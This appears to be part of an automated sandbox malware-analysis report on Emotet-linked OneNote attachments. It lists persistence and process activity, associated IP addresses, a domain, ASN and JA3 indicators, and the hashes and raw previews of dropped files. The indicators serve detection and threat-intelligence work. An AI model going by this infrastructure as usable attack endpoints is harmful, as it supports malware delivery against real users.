                                                                                                                          09:23:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
                                                                                                                          09:23:35API Interceptor2x Sleep call for process: wscript.exe modified
                                                                                                                          09:24:02API Interceptor23x Sleep call for process: regsvr32.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          110.232.117.186Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                            Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                              Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                  OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                    Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                      Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                        OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                          OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                            OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                              OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                  opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                    Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                      Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                        omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                          report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                            2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                              report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                100935929722734787.oneGet hashmaliciousEmotetBrowse

                                                                                                                                                                  Domains

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  penshorn.orgInsight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131

                                                                                                                                                                  ASNs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  RACKCORP-APRackCorpAUINNOVINC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186
                                                                                                                                                                  report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 110.232.117.186

                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  ce5f3254611a8c095a3d821d44539877INNOVINC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  aRThcK3rSO.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  click.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                                                  • 203.26.41.131
                                                                                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                                                                                  • 203.26.41.131

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dllINNOVINC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                    Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                      Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                        Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                            OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                              Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                  OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                    OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                      OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                        OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                          Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                            opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                              Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                  omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                    report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                      2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):62582
                                                                                                                                                                                                          Entropy (8bit):7.996063107774368
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                                                                                                                                          MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                                                                                                                                          SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                                                                                                                                          SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                                                                                                                          SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

                                                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                          Entropy (8bit):3.1335351732898324
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:kKrl4ry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:zlwCvkPlE99SNxAhUext
                                                                                                                                                                                                          MD5:DCB4E98CB1058F23A638D93D216701E7
                                                                                                                                                                                                          SHA1:55F71A963AA9DFE25E29ED77073D57D0230A23F1
                                                                                                                                                                                                          SHA-256:1DB8E8A0AA41CE73675125E9DAC78C4DD79D99630B2564E4446409388B500415
                                                                                                                                                                                                          SHA-512:A7ED2DAFE01C944CED0268A931A8EA6A5F7DF0BEF0EA6C87666B6E608A3EC0952BC637313782ADDC1E54FF4A06AAC9125E80335A453BFBE451FBE52CB140A830
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:p...... ........z..X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0FA10290-6778-4D86-943C-754A19FE889E

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):154907
                                                                                                                                                                                                          Entropy (8bit):5.352022360033273
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:z+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:ycQ9DQl+zrXgb
                                                                                                                                                                                                          MD5:DC93E9C1B0FF9BC79B8F5E80B39C62BB
                                                                                                                                                                                                          SHA1:36BC533DC13A2B922200BF4FFB46C500411AC3CE
                                                                                                                                                                                                          SHA-256:20D0CE899EB11C2F3AEF2AF12C12AD0E2339DE269B6881B00F1FB9F89091842E
                                                                                                                                                                                                          SHA-512:9ADAC6D82451F918FADB83014734550A3354DE69815DB25DEF1513A9FAFE4DD0BAED0573D706CEC41FAD9181A8BCC3B8704906DEAC97DA952B9D89BF374BA021
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-17T08:22:51">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):70280
                                                                                                                                                                                                          Entropy (8bit):0.16140040305041542
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:BYyfB0FoOLqVsC32vDiqB9VMrcA8XcEfswk:BnBeoOcHQH2PU1swk
                                                                                                                                                                                                          MD5:42C11E480454CC2E194A810F5AB823E0
                                                                                                                                                                                                          SHA1:FDEACE97C68AFDE02DE468A2C0C371BD61F40A72
                                                                                                                                                                                                          SHA-256:D68AC5AE5C2126604CA210BBB9F5845EE537D3DA464DF6FF2274A81080245012
                                                                                                                                                                                                          SHA-512:A4869A8214164D07E32B2AEBEBEC8797BF5EB3EFB5F85BDFC2EBCB7343D083C0BEF0AEE6AE32E69FD9C8A80B6251919CC17882702EEA4D395785C33B86CB7F98
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.R\{..M..Sx.)....)....F. .U.-.m................?.....I.......*...*...*...*...........................................................................................h...........................h.................90..E.C...2...........^.o...A.w.J.................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
